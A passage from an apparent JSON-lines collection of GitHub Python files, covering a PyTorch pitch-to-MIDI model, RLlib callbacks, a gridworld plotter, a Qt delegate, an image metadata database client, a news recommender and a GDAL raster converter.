is_training is True:\n self.train()\n else:\n self.eval()\n \n #loss_function = torch.nn.MSELoss()\n loss_function = torch.nn.BCELoss()\n input, target_output = self.get_random_training_batch(examples_per_batch, is_training)\n input = torch.FloatTensor(input)\n target_output = torch.FloatTensor(target_output)\n \n if self.use_cpu == False:\n input = input.cuda()\n target_output = target_output.cuda()\n\n output = self(input)\n return loss_function(output, target_output)\n \n #-------------------------------------------------------------------------------------------\n def train_model(self, num_batches, examples_per_batch, save_every, lr) :\n optimizer = optim.Adam(self.parameters())\n #optimizer = optim.SGD(self.parameters(), lr, momentum=0.9)\n for p in optimizer.param_groups : p['lr'] = lr\n start = time.time()\n \n for batch in range(self.get_saved_num_batches(), num_batches) :\n optimizer.zero_grad()\n loss = self.do_forward_batch_and_get_loss(examples_per_batch, True)\n loss.backward()\n #torch.nn.utils.clip_grad_norm_(self.parameters(), 1)\n optimizer.step()\n \n validation_loss = 0#self.validate(examples_per_batch)\n elapsed = self.time_since(start)\n speed = (time.time() - start) / (batch + 1)\n\n print(\"Batch {0} of {1} --- Training Loss: {2} --- Validation Loss: {3} --- Elapsed Time: {4} --- Sec / Batch: {5}\".format(batch + 1, num_batches, loss.item(), validation_loss, elapsed, speed))\n if (((batch+1) % save_every) == 0) or (batch is num_batches-1):\n self.save_checkpoint(batch+1)\n self.reverse_synthesize_gold_standard(\"Josquin\")\n self.reverse_synthesize_gold_standard(\"Fugue\")\n self.reverse_synthesize_gold_standard(\"Flute\")\n self.reverse_synthesize_gold_standard(\"MIDI\")\n\n\n #-------------------------------------------------------------------------------------------\n def validate(self, examples_per_batch) :\n loss = self.do_forward_batch_and_get_loss(examples_per_batch, False)\n return loss.item()\n\n #-------------------------------------------------------------------------------------------\n def sample(self):\n #self.reverse_synthesize_gold_standard(\"Josquin\")\n #self.reverse_synthesize_gold_standard(\"Fugue\")\n #self.reverse_synthesize_gold_standard(\"Flute\")\n self.reverse_synthesize_gold_standard(\"MIDI\")\n \n #-------------------------------------------------------------------------------------------\n def reverse_synthesize_gold_standard(self, filename) :\n gold_standards = glob.glob(os.path.join(self.data_directory, \"Validation/Gold_Standard/\", filename + \".wav\"))\n if len(gold_standards) < 1:\n print(\"Unable to find file {} for reverse synthesis\".format(filename))\n return\n gold_standard = gold_standards[0]\n wav, sr = librosa.load(gold_standard, sr=self.sample_rate, mono=True)\n midi = MidiFile()\n track = MidiTrack()\n midi.tracks.append(track)\n start_sample = 0\n prev_notes = []\n output = torch.zeros(self.output_size) #np.zeros(self.output_size)\n #smoothed_spectrum = np.zeros(self.input_size)\n #smoothing_coefficient = 0.99\n frames_since_last_event = 0\n \n on_for = 4.0\n off_for = 4.0\n on_count = np.zeros(self.output_size)\n \n while (start_sample + self.input_size) < len(wav):\n input = wav[start_sample : start_sample + self.input_size]\n input = self.calculate_audio_features(input)\n prev_output_vector = self.output_notes_to_vector(prev_notes)\n input = np.concatenate((input, prev_output_vector))\n #input = np.concatenate((input, output.detach().numpy()))\n \n #input = np.multiply(input, 1.0-smoothing_coefficient);\n #smoothed_spectrum = np.multiply(input, smoothing_coefficient);\n #input = np.add(input, smoothed_spectrum)\n \n current_notes = []\n \n input = torch.FloatTensor(input)\n output = self(input)\n for i in range(len(output)) :\n if np.random.sample() < output[i] :\n on_count[i] += 1.0 / on_for\n if on_count[i] > 1 :\n on_count[i] = 1\n if (on_count[i] == 1) or (i + self.lowest_midi_note in prev_notes) :\n current_notes.append(i + self.lowest_midi_note)\n \n else :\n on_count[i] -= 1.0 / off_for\n if on_count[i] <= 0 :\n on_count[i] = 0\n elif (i + self.lowest_midi_note in prev_notes) :\n current_notes.append(i + self.lowest_midi_note)\n \n \n #for i in range(len(output)) :\n # if output[i] > 0.5 :\n # if np.random.sample() < output[i] :\n # current_notes.append(i + self.lowest_midi_note)\n\n note_ons = np.setdiff1d(current_notes, prev_notes, assume_unique=True)\n note_offs = np.setdiff1d(prev_notes, current_notes, assume_unique=True)\n\n t = round((2 * midi.ticks_per_beat * frames_since_last_event * self.hop_size / sr))\n \n for n in note_offs:\n track.append(Message('note_off', note=n, velocity=0, time=t))\n t=0\n\n for n in note_ons:\n track.append(Message('note_on', note=n, velocity=64, time=t))\n t=0\n\n if len(note_offs) + len(note_ons) == 0:\n frames_since_last_event += 1\n else:\n frames_since_last_event = 1\n\n prev_notes = current_notes\n start_sample += self.hop_size\n path = os.path.join(self.session_directory, self.model_save_prefix + \"gold_standard_\" + filename + str(self.get_saved_num_batches()).zfill(6) + \".mid\")\n midi.save(path)\n","repo_name":"michaelkrzyzaniak/squiggles-pipe-organ","sub_path":"machine_learning/Python/models/Multiple_F0.py","file_name":"Multiple_F0.py","file_ext":"py","file_size_in_byte":16538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28538272644","text":"import argparse\nimport os\nfrom typing import TYPE_CHECKING, Dict, Optional, Tuple, Union\n\nimport numpy as np\nimport ray\nfrom ray import tune\nfrom ray.rllib.agents.callbacks import DefaultCallbacks\nfrom ray.rllib.algorithms.callbacks import DefaultCallbacks\nfrom ray.rllib.env import BaseEnv\nfrom ray.rllib.env.base_env import BaseEnv\nfrom ray.rllib.evaluation import Episode, RolloutWorker\nfrom ray.rllib.evaluation.episode import Episode\nfrom ray.rllib.evaluation.episode_v2 import EpisodeV2\nfrom ray.rllib.policy import Policy\nfrom ray.rllib.policy.sample_batch import SampleBatch\nfrom ray.rllib.utils.typing import AgentID, EnvType, PolicyID\n\nif TYPE_CHECKING:\n from ray.rllib.algorithms.algorithm import Algorithm\n from ray.rllib.evaluation import RolloutWorker\n\n\nclass PolicyIntoEnv(DefaultCallbacks):\n def on_episode_start(\n self,\n *,\n worker: \"RolloutWorker\",\n base_env: BaseEnv,\n policies: Dict[PolicyID, Policy],\n episode: Union[Episode, EpisodeV2],\n **kwargs,\n ) -> None:\n \"\"\"A callback that puts the policies into the env, so that the env can access them.\n Used for hidden-queries experiments, similar to the two callbacks below.\n All three implement the same behavior in different ways.\"\"\"\n for env in base_env.envs:\n env.unwrapped.policies = policies\n env.unwrapped.worker = worker\n\n\nclass DeleteHiddenQueriesCallback(DefaultCallbacks):\n def on_postprocess_trajectory(\n self,\n *,\n worker: RolloutWorker,\n episode: Episode,\n agent_id: str,\n policy_id: str,\n policies: Dict[str, Policy],\n postprocessed_batch: SampleBatch,\n original_batches: Dict[str, Tuple[Policy, SampleBatch]],\n **kwargs,\n ):\n \"\"\"A callback that deletes hidden queries from the batch.\n WARNING! This is hacky, and will *only* work if the hidden queries are the first items in the batch.\n In particular, only use this if the env puts them at the start of the episode only, *and* make sure\n that each batch is exactly one episode long, i.e. batch_mode=\"complete_episodes\" and rollout_fragment_length=1.\"\"\"\n first_real_step = -1\n for i in range(postprocessed_batch.count):\n if \"hidden\" in postprocessed_batch[\"infos\"][i] and postprocessed_batch[\"infos\"][i][\"hidden\"]:\n first_real_step = i\n if first_real_step != -1:\n test_postprocessed_batch = postprocessed_batch.slice(first_real_step + 2, postprocessed_batch.count)\n for key in postprocessed_batch:\n postprocessed_batch[key] = postprocessed_batch[key][first_real_step + 2 :]\n postprocessed_batch.count = postprocessed_batch.count - first_real_step - 2\n\n pass\n\n\nclass DeleteHiddenQueriesPrePostprocessCallback(DefaultCallbacks):\n def on_postprocess_trajectory(\n self,\n *,\n worker: RolloutWorker,\n episode: Episode,\n agent_id: str,\n policy_id: str,\n policies: Dict[str, Policy],\n postprocessed_batch: SampleBatch,\n original_batches: Dict[str, Tuple[Policy, SampleBatch]],\n pre_postprocess: bool = False,\n **kwargs,\n ):\n \"\"\"A callback that deletes hidden queries from the batch.\n WARNING! This is hacky, and will *only* work if the hidden queries are the first items in the batch.\n In particular, only use this if the env puts them at the start of the episode only, *and* make sure\n that each batch is exactly one episode long, i.e. batch_mode=\"complete_episodes\" and rollout_fragment_length=1.\"\"\"\n if pre_postprocess:\n first_real_step = -1\n for i in range(postprocessed_batch.count):\n if \"hidden\" in postprocessed_batch[\"infos\"][i] and postprocessed_batch[\"infos\"][i][\"hidden\"]:\n first_real_step = i\n if first_real_step != -1:\n truncated_batch = postprocessed_batch.slice(first_real_step + 2, postprocessed_batch.count)\n original_batches[policy_id] = (policies[policy_id], truncated_batch)\n for key in postprocessed_batch:\n postprocessed_batch[key] = postprocessed_batch[key][first_real_step + 2 :]\n postprocessed_batch.count = postprocessed_batch.count - first_real_step - 2\n else:\n pass\n\n pass\n","repo_name":"mgerstgrasser/oracles_and_followers","sub_path":"stackerlberg/trainers/callbacks.py","file_name":"callbacks.py","file_ext":"py","file_size_in_byte":4430,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"5501150220","text":"import numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\n\n\nclass Renderer:\n def __init__(self, reward_map, goal_state, wall_state):\n self.reward_map = reward_map\n self.goal_state = goal_state\n self.wall_state = wall_state\n self.ys = len(self.reward_map)\n self.xs = len(self.reward_map[0])\n\n self.ax = None\n self.fig = None\n self.first_flg = True\n\n def set_figure(self, figsize=None):\n fig = plt.figure(figsize=figsize)\n self.ax = fig.add_subplot(111)\n ax = self.ax\n ax.clear()\n ax.tick_params(labelbottom=False, labelleft=False, labelright=False, labeltop=False)\n ax.set_xticks(range(self.xs))\n ax.set_yticks(range(self.ys))\n ax.set_xlim(0, self.xs)\n ax.set_ylim(0, self.ys)\n ax.grid(True)\n\n def render_v(self, v=None, policy=None, print_value=True):\n self.set_figure()\n\n ys, xs = self.ys, self.xs\n ax = self.ax\n\n if v is not None:\n color_list = ['red', 'white', 'green']\n cmap = matplotlib.colors.LinearSegmentedColormap.from_list(\n 'colormap_name', color_list)\n\n # dict -> ndarray\n v_dict = v\n v = np.zeros(self.reward_map.shape)\n for state, value in v_dict.items():\n v[state] = value\n\n vmax, vmin = v.max(), v.min()\n vmax = max(vmax, abs(vmin))\n vmin = -1 * vmax\n vmax = 1 if vmax < 1 else vmax\n vmin = -1 if vmin > -1 else vmin\n\n ax.pcolormesh(np.flipud(v), cmap=cmap, vmin=vmin, vmax=vmax)\n\n for y in range(ys):\n for x in range(xs):\n state = (y, x)\n r = self.reward_map[y, x]\n if r != 0 and r is not None:\n txt = 'R ' + str(r)\n if state == self.goal_state:\n txt = txt + ' (GOAL)'\n ax.text(x+.1, ys-y-0.9, txt)\n\n if (v is not None) and state != self.wall_state:\n if print_value:\n offsets = [(0.4, -0.15), (-0.15, -0.3)]\n key = 0\n if v.shape[0] > 7: key = 1\n offset = offsets[key]\n ax.text(x+offset[0], ys-y+offset[1], \"{:12.2f}\".format(v[y, x]))\n\n if policy is not None and state != self.wall_state:\n actions = policy[state]\n max_actions = [kv[0] for kv in actions.items() if kv[1] == max(actions.values())]\n\n arrows = [\"↑\", \"↓\", \"←\", \"→\"]\n offsets = [(0, 0.1), (0, -0.1), (-0.1, 0), (0.1, 0)]\n for action in max_actions:\n arrow = arrows[action]\n offset = offsets[action]\n if state == self.goal_state:\n continue\n ax.text(x+0.45+offset[0], ys-y-0.5+offset[1], arrow)\n\n if state == self.wall_state:\n ax.add_patch(plt.Rectangle((x,ys-y-1), 1, 1, fc=(0.4, 0.4, 0.4, 1.)))\n plt.show()\n\n def render_q(self, q, show_greedy_policy=True):\n self.set_figure()\n\n ys, xs = self.ys, self.xs\n ax = self.ax\n action_space = [0, 1, 2, 3]\n\n qmax, qmin = max(q.values()), min(q.values())\n qmax = max(qmax, abs(qmin))\n qmin = -1 * qmax\n qmax = 1 if qmax < 1 else qmax\n qmin = -1 if qmin > -1 else qmin\n\n\n color_list = ['red', 'white', 'green']\n cmap = matplotlib.colors.LinearSegmentedColormap.from_list(\n 'colormap_name', color_list)\n\n for y in range(ys):\n for x in range(xs):\n for action in action_space:\n state = (y, x)\n r = self.reward_map[y, x]\n if r != 0 and r is not None:\n txt = 'R ' + str(r)\n if state == self.goal_state:\n txt = txt + ' (GOAL)'\n ax.text(x+.05, ys-y-0.95, txt)\n\n if state == self.goal_state:\n continue\n\n tx, ty = x, ys-y-1\n\n action_map = {\n 0: ((0.5+tx, 0.5+ty), (tx+1, ty+1), (tx, ty+1)),\n 1: ((tx, ty), (tx+1, ty), (tx+0.5, ty+0.5)),\n 2: ((tx, ty), (tx+0.5, ty+0.5), (tx, ty+1)),\n 3: ((0.5+tx, 0.5+ty), (tx+1, ty), (tx+1, ty+1)),\n }\n offset_map = {\n 0: (0.1, 0.8),\n 1: (0.1, 0.1),\n 2: (-0.2, 0.4),\n 3: (0.4, 0.4),\n }\n if state == self.wall_state:\n ax.add_patch(plt.Rectangle((tx, ty), 1, 1, fc=(0.4, 0.4, 0.4, 1.)))\n elif state in self.goal_state:\n ax.add_patch(plt.Rectangle((tx, ty), 1, 1, fc=(0., 1., 0., 1.)))\n else:\n\n tq = q[(state, action)]\n color_scale = 0.5 + (tq / qmax) / 2 # normalize: 0.0-1.0\n\n poly = plt.Polygon(action_map[action],fc=cmap(color_scale))\n ax.add_patch(poly)\n\n offset= offset_map[action]\n ax.text(tx+offset[0], ty+offset[1], \"{:12.2f}\".format(tq))\n plt.show()\n\n if show_greedy_policy:\n policy = {}\n for y in range(self.ys):\n for x in range(self.xs):\n state = (y, x)\n qs = [q[state, action] for action in range(4)] # action_size\n max_action = np.argmax(qs)\n probs = {0:0.0, 1:0.0, 2:0.0, 3:0.0}\n probs[max_action] = 1\n policy[state] = probs\n self.render_v(None, policy)","repo_name":"oreilly-japan/deep-learning-from-scratch-4","sub_path":"common/gridworld_render.py","file_name":"gridworld_render.py","file_ext":"py","file_size_in_byte":6030,"program_lang":"python","lang":"en","doc_type":"code","stars":287,"dataset":"github-code","pt":"32"} +{"seq_id":"32595532394","text":"from __future__ import annotations\n\nfrom prettyqt import core, gui, widgets\n\n\n# https://stackoverflow.com/a/55252650/3620725\n\n\nclass NoFocusDelegate(widgets.StyledItemDelegate):\n \"\"\"Delegate to remove dotted border on cell focus.\"\"\"\n\n ID = \"no_focus\"\n\n def paint(\n self,\n painter: gui.QPainter,\n option: widgets.QStyleOptionViewItem,\n index: core.ModelIndex,\n ):\n if option.state & widgets.Style.StateFlag.State_HasFocus:\n option.state = option.state ^ widgets.Style.StateFlag.State_HasFocus\n super().paint(painter, option, index)\n","repo_name":"phil65/PrettyQt","sub_path":"prettyqt/itemdelegates/nofocusdelegate.py","file_name":"nofocusdelegate.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"32"} +{"seq_id":"41051961476","text":"# Functions go here\r\n\r\n\r\n# Main routine goes here\r\nerror = \"please enter a whole number between 1 and 10\"\r\n\r\nwhile True:\r\n try:\r\n response = int(input(\"How much would like to play with?\"))\r\n\r\n if 0 < response <= 10:\r\n print(\"you have asked to play with ${}\".format(response))\r\n\r\n else:\r\n print(error)\r\n\r\n except ValueError:\r\n print(error)\r\n","repo_name":"lingj1206/Lucky-Unicorn","sub_path":"04_LU_Base_v_01.py","file_name":"04_LU_Base_v_01.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71103771290","text":"import datetime as datetime\nimport logging\nimport os\nfrom concurrent.futures import ThreadPoolExecutor\nfrom pathlib import Path\nfrom typing import List, Tuple\n\nfrom PIL import Image\nimport imagehash\nfrom clients.openweather.openweather_client import OpenWeatherClient\nfrom clients.yandex_geocoder.yandex_geocoder_client import YandexGeocoderClient\nfrom database.database_sqlite import ImageDatabase\nfrom image_processing.color_processing import get_color_info\nfrom image_processing.exif_processing import get_exif_info_from_image, read_exif_info\nfrom image_processing.weather_processing import get_weather_info\nfrom model.image_colors_info import ImageColorsInfo\nfrom model.image_exif_info import ImageExifInfo\nfrom model.image_info import ImageInfo\nfrom utils.config import load_config\nfrom utils.image_file_utils import get_image_extension, get_image_name, create_dir, remove_dir, get_parent_path\n\nPROJECT_DIR = Path(__file__).parents[1]\nRESOURCES_DIR = PROJECT_DIR / 'resources'\n\n\nclass ImageDatabaseSQLiteClient:\n\n def __init__(self):\n config = load_config(RESOURCES_DIR)\n self._db = ImageDatabase(os.path.join(PROJECT_DIR, config.database.database_db_file_path))\n self._image_resource_path = os.path.join(PROJECT_DIR, config.database.database_resources_path)\n self._image_processing_executor = ThreadPoolExecutor(max_workers=1)\n\n self._geocoder_client = YandexGeocoderClient(config.clients.yandex_geocoder_api_key)\n self._open_weather_client = OpenWeatherClient(config.clients.open_weather_api_key)\n\n def _get_image_resource_dir(self, image_id: int) -> str:\n return os.path.join(self._image_resource_path, f'image_{image_id}')\n\n def _get_image_file(self, image_id: int) -> str:\n image_resources_dir = self._get_image_resource_dir(image_id)\n image_name = self._db.get_image_name_by_entry_id(image_id)\n image_file = os.path.join(image_resources_dir, image_name)\n return image_file\n\n def _add_images_to_database(self, image_paths: List[str]) -> List[int]:\n image_ids = []\n logging.info(f'Start to add images to database')\n for image_path in image_paths:\n logging.info(f'Adding image {image_path}')\n\n # Check given file by path exists\n if not os.path.exists(image_path):\n logging.warning(f\"File {image_path} do not exist\")\n continue\n\n # Check given file by path is image (has extensions .png, .jpeg, .jpg)\n image_name = get_image_name(image_path)\n if get_image_extension(image_name) is None:\n logging.warning(f\"File {image_name} is not an image\")\n continue\n\n image = Image.open(image_path)\n\n # Save image to database\n image_hash = str(imagehash.average_hash(image))\n image_id = self._db.add_new_image(image_name, image_hash)\n image_ids.append(image_id)\n\n # Create directory for new image in resources directory\n image_resources_dir = self._get_image_resource_dir(image_id)\n create_dir(image_resources_dir)\n\n # Copy image to resources directory\n image_resource_file = os.path.join(image_resources_dir, image_name)\n if 'exif' in image.info:\n image.save(image_resource_file, quality=20, optimize=True,\n exif=image.info['exif'])\n else:\n image.save(image_resource_file, quality=20, optimize=True)\n\n logging.info(f\"File {image_path} was saved to database with id {image_id}\")\n\n logging.info(f'Finish to add images to database')\n return image_ids\n\n def _add_exif_info_for_image(self, image_id: int):\n image_file = self._get_image_file(image_id)\n\n # Extracting exif information\n logging.info(f\"Extracting exif information from image: {image_id}\")\n exif_info = get_exif_info_from_image(image_file)\n\n # If there is no exif data try to read it from user\n if exif_info is None:\n logging.info(f\"Can not get exif info for image: {image_id}\")\n exif_info = read_exif_info(image_file, self._geocoder_client)\n\n # If user data is not correct return\n if exif_info is None:\n raise Exception(f\"Failed to get or read exif info for image: {image_id}\")\n\n # Add exif info to database\n self._db.add_exif_info(image_id, exif_info)\n\n def _add_weather_info_for_image(self, image_id: int):\n gps_info = self._db.get_gps_info_by_entry_id(image_id)\n date_time_info = self._db.get_datetime_by_entry_id(image_id)\n\n # Extracting weather information\n logging.info(f\"Extracting weather information from image: {image_id}\")\n weather_info = get_weather_info(gps_info.location(), date_time_info.date_time, self._open_weather_client)\n\n # If there is no weather info try to read it from user\n if weather_info is None:\n logging.info(f\"Can not get weather info for image: {image_id}\")\n image_file = self._get_image_file(image_id)\n # weather_info = read_weather_info(image_file)\n\n # If user data is not correct return\n if weather_info is None:\n raise Exception(f\"Failed to get or read weather info for image: {image_id}\")\n\n # Add weather info to database\n self._db.add_weather_info(image_id, weather_info)\n\n def _add_color_info_for_image(self, image_id: int):\n image_file = self._get_image_file(image_id)\n\n # Extracting color information\n logging.info(f\"Extracting color information from image: {image_id}\")\n color_info = get_color_info(image_file)\n\n # Add colors info to database\n for color in color_info.colors:\n self._db.add_color_info(image_id, color)\n\n def _add_images_info_to_database(self, image_ids: List[int]) -> List[int]:\n processed_image_ids = []\n logging.info(f'Start to add images infos to database')\n for image_id in image_ids:\n logging.info(f'Start processing image {image_id}')\n\n try:\n self._add_exif_info_for_image(image_id)\n self._add_weather_info_for_image(image_id)\n self._add_color_info_for_image(image_id)\n\n except Exception as e:\n logging.error(f'Skipping image {image_id} due to error: {e}')\n self._db.delete_image_by_entry_id(image_id)\n remove_dir(self._get_image_resource_dir(image_id))\n continue\n\n processed_image_ids.append(image_id)\n logging.info(f'Finish processing image {image_id}')\n\n logging.info(f'Finish to add images infos to database')\n return processed_image_ids\n\n def add_images(self, image_paths: List[str]):\n added_image_ids = self._add_images_to_database(image_paths)\n print(f'{len(added_image_ids)}/{len(image_paths)} have been successfully uploaded')\n\n # TODO: Make operation async\n processed_image_ids = self._add_images_info_to_database(added_image_ids)\n print(f'{len(processed_image_ids)}/{len(added_image_ids)} have been successfully processed')\n\n def get_images(self,\n location: Tuple[float, float],\n date_time: datetime.datetime,\n weather: int,\n hour_delta=3,\n month_delta=1,\n latitude_delta=0.5,\n longitude_delta=0.5,\n weather_delta=30) -> List[ImageInfo]:\n\n image_ids = self._db.get_entry_id_by_parameters(\n hour_interval_left=(date_time.hour - hour_delta + 24) % 24,\n hour_interval_right=(date_time.hour + hour_delta + 24) % 24,\n month_interval_left=(date_time.month - month_delta - 1) % 12 + 1,\n month_interval_right=(date_time.month + month_delta - 1) % 12 + 1,\n latitude_interval_left=location[0] - latitude_delta,\n latitude_interval_right=location[0] + latitude_delta,\n longitude_interval_left=location[1] - longitude_delta,\n longitude_interval_right=location[1] + longitude_delta,\n weather_interval_left=max(0, weather - weather_delta),\n weather_interval_right=min(100, weather + weather_delta),\n )\n\n images = []\n for image_id in image_ids:\n image_file = self._get_image_file(image_id)\n image_pallet = os.path.join(get_parent_path(image_file), 'palette.png')\n image_clusters = os.path.join(get_parent_path(image_file), 'clusters.png')\n\n image = ImageInfo(\n id=image_id,\n name=self._db.get_image_name_by_entry_id(image_id),\n exif_info=ImageExifInfo(\n date_time_info=self._db.get_datetime_by_entry_id(image_id),\n gps_info=self._db.get_gps_info_by_entry_id(image_id)\n ),\n weather_info=self._db.get_weather_info_by_entry_id(image_id),\n colors_info=ImageColorsInfo(self._db.get_colors_info_by_entry_id(image_id)),\n image_path=image_file,\n palette_path=image_pallet,\n clusters_path=image_clusters\n )\n images.append(image)\n return images\n","repo_name":"tiginamaria/ITMO_CT","sub_path":"database/database_client_sqlite.py","file_name":"database_client_sqlite.py","file_ext":"py","file_size_in_byte":9370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32083235343","text":"import numpy as np\nimport json\n'''\n基于内容的推荐,对于每一个用户来说,所需要推荐的内容都是不一样的,\n所以可以考虑类是以用户为单位的,\n考虑到tf-idf矩阵是一个公共的数据,所有人都要用\n'''\n\n\nclass ContentBased_User(object):\n '用户的基于内容推荐的基类'\n users_cnt = 0 # 用户数量\n\n def __init__(self, key_words, profile, already_viewed_news = None):\n if already_viewed_news is None:\n already_viewed_news = dict()\n with open('recommender/CB/storage/already_views.json', 'r') as fin:\n # with open('/Users/sizihua/Desktop/DaChuang/Backend/recommender/CB/storage/already_views.json', 'r') as fin:\n already_viewed_news = json.load(fin)\n self.key_word_list = key_words # 用户的关键词列表\n self.user_profile = profile # 此用户的用户画像\n # self.already_view = dict() #已经浏览过的页面,dict是哈希表,O(1)复杂度\n self.already_view = already_viewed_news\n\n\n def generate_user_profile(self, tfidf, user_ratings):\n \"\"\"\n tfidf的格式:行代表特征词 列代表文章\n \"\"\"\n # 将已经看过的内容添加到 already_view中\n for item in user_ratings:\n self.already_view[item] = 1\n\n\n # 这里的user_ratings是以dict的形式存储 格式 doc ID : score\n # 生成用户画像\n user_profile = np.zeros((tfidf.shape[0], 1))\n '''\n 假定大于0是喜欢 小于0是不喜欢,数据是已经预处理好的\n '''\n # rocchio algorithm 一般设置 a = 1,b = 0.8, c = 0.1\n b = 0.8\n c = 0.1\n threshold_rate = 1e-10\n\n pos_cnt = 0\n neg_cnt = 0\n '''\n 下面这里没有想好相关的新闻和不相关的新闻如何影响user profile,暂定是乘得分作为影响\n '''\n for item in user_ratings:\n if(user_ratings[item] >= 0):\n pos_cnt += 1\n for item in user_ratings:\n if(user_ratings[item] < 0):\n neg_cnt += 1\n\n for item in user_ratings:\n if(user_ratings[item] >= 0):\n user_profile[:, 0] += b/pos_cnt * tfidf[:, item]\n\n for item in user_ratings:\n if(user_ratings[item] < 0):\n user_profile[:, 0] -= c/neg_cnt * tfidf[:, item]\n\n (rows, cols) = user_profile.shape\n\n '''\n user\n vocabulary|--|\n | |\n metric: | |\n | |\n |--|\n '''\n self.user_profile = user_profile\n self.user_profile[np.isnan(self.user_profile)] = 0\n\n def update_user_profile(self, tfidf, user_ratings):\n # 添加已经看了的内容\n for item in user_ratings:\n self.already_view[item] = 1\n\n # 新增加了一些评价,更新用户画像\n\n b = 0.8\n c = 0.1\n\n pos_cnt = 0\n neg_cnt = 0\n '''\n 下面这里没有想好相关的新闻和不相关的新闻如何影响user profile,暂定是乘得分作为影响\n '''\n for item in user_ratings:\n if(user_ratings[item] >= 0):\n pos_cnt += 1\n for item in user_ratings:\n if(user_ratings[item] < 0):\n neg_cnt += 1\n\n for item in user_ratings:\n if(user_ratings[item] >= 0):\n self.user_profile[:, 0] += b/pos_cnt * tfidf[:, item]\n\n for item in user_ratings:\n if(user_ratings[item] < 0):\n self.user_profile[:, 0] -= c/neg_cnt * tfidf[:, item]\n self.user_profile[np.isnan(self.user_profile)] = 0\n\n def generate_recommand(self, tfidf, topN = 5):\n # 产生推荐结果\n\n for i in range(self.user_profile.shape[1]):\n scores = []\n index = []\n u = self.user_profile[:, i:i+1]\n for j in range(tfidf.shape[1]):\n v = tfidf[:, j:j+1]\n\n if np.linalg.norm(v) == 0:\n # 有一些新闻是空的,还没看到哪里出问题了\n # 只有个别的新闻是全英文所以没有关键词,其余的新闻还有一些是0\n continue\n tmp = np.dot(u.T,v) / np.linalg.norm(u) / np.linalg.norm(v)\n scores.append(tmp[0][0]) # score list存储每一个新闻的预测得分\n index.append(j)\n result = self.find_top_n_items(scores, index, topN)\n self.save_dict_to_json('recommender/CB/storage/already_views.json', self.already_view)\n # self.save_dict_to_json('/Users/sizihua/Desktop/DaChuang/Backend/recommender/CB/storage/already_views.json', self.already_view)\n return result\n\n def find_top_n_items(self, scores, index, n):\n # 输出前n个结果\n result = list()\n scores = np.array(scores)\n indecies = np.argsort(-scores)\n cnt = 0\n i = 0\n while(cnt < n):\n # 排除掉已经看过的新闻\n if self.already_view.__contains__(str(index[indecies[i]])):\n i += 1\n continue\n\n # print(cnt)\n # print('index : ', index[indecies[i]], \" score: \", scores[indecies[i]])\n result.append(index[indecies[i]])\n self.already_view[index[indecies[i]]] = 0\n i += 1\n cnt += 1\n return result\n\n def save_dict_to_json(self, file_path, dictionary):\n '''\n 把dict保存为json储存在本地\n '''\n json_str = json.dumps(dictionary)\n with open(file_path, 'w') as fout:\n fout.write(json_str)","repo_name":"Ethan00Si/JuHeRenDa","sub_path":"Backend/recommender/CB/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":5725,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"32"} +{"seq_id":"73349244571","text":"import os\r\nfrom osgeo import gdal\r\nimport numpy as np\r\n\r\n'''读取HDF文件数据'''\r\ndef test(path):\r\n band_fn = path + '/' + 'MOD13Q1.A2015289.h25v06.006.2015317212006.hdf'\r\n ds = gdal.Open(band_fn)\r\n subdatasets = ds.GetSubDatasets()\r\n in_ds = gdal.Open(subdatasets[0][0])\r\n in_band = in_ds.GetRasterBand(1)\r\n in_data = in_band.ReadAsArray()\r\n driver = gdal.GetDriverByName('GTiff')\r\n out_ds = driver.Create(path + '/' + 'modis_data.tif', in_band.XSize, in_band.YSize, 1, in_band.DataType)\r\n out_ds.SetProjection(in_ds.GetProjection())\r\n out_ds.SetGeoTransform(in_ds.GetGeoTransform())\r\n out_band = out_ds.GetRasterBand(1)\r\n out_band.WriteArray(in_data)\r\n out_band.FlushCache()\r\n return\r\n\r\n \r\nif __name__ == \"__main__\":\r\n path = os.getcwd()\r\n test(path)\r\n \r\n","repo_name":"fykx/gdal","sub_path":"hdf_to_tif_1.py","file_name":"hdf_to_tif_1.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"71739042970","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\n\n\n@Date : Fri Nov 14 13:20:38 2014 \\n\n@Author : Erwan Ledoux \\n\\n\n\n\n\nA Connecter \n\n\"\"\"\n\n#\nimport ShareYourSystem as SYS\nBaseModuleStr=\"ShareYourSystem.Standards.Itemizers.Parenter\"\nDecorationModuleStr=\"ShareYourSystem.Standards.Classors.Classer\"\nSYS.setSubModule(globals())\nSYS.addDo('Connecter','Connect','Connecting','Connected')\n#\n\n#\nfrom ShareYourSystem.Standards.Interfacers import Printer\nfrom ShareYourSystem.Standards.Itemizers import Pather,Teamer,Manager,Parenter\n#\n\n#\nConnectKeyPrefixStr=\"*\"\nConnectGetSetPrefixStr=\"->\"\nConnectInTeamKeyStr=\"Inlets\"\nConnectOutTeamKeyStr=\"Outlets\"\nConnectConnectKeyStr='?>'\nConnectManagementPrefixStr='_p_'\ndef getLiargVariablesList(_ValueVariable):\n\treturn _ValueVariable\n#\n\n#\n@DecorationClass()\nclass ConnecterClass(BaseClass):\n\n\tdef default_init(\n\t\t\t\t\tself,\n\t\t\t\t\t_ConnectingKeyVariable=None,\n\t\t\t\t\t_ConnectingGetBool=True,\n\t\t\t\t\t_ConnectedToVariable=None,\n\t\t\t\t\t**_KwargVariablesDict\n\t\t\t\t):\n\n\t\t#Call the parent init method\n\t\tBaseClass.__init__(self,**_KwargVariablesDict)\n\n\tdef do_connect(self):\n\n\t\t#/####################/#\n\t\t# Get the connected variable\n\t\t#\n\n\t\t#debug\n\t\t'''\n\t\tself.debug(\n\t\t\t[\n\t\t\t\t'Adapt the type for getting things to connect',\n\t\t\t\t'(if we need to 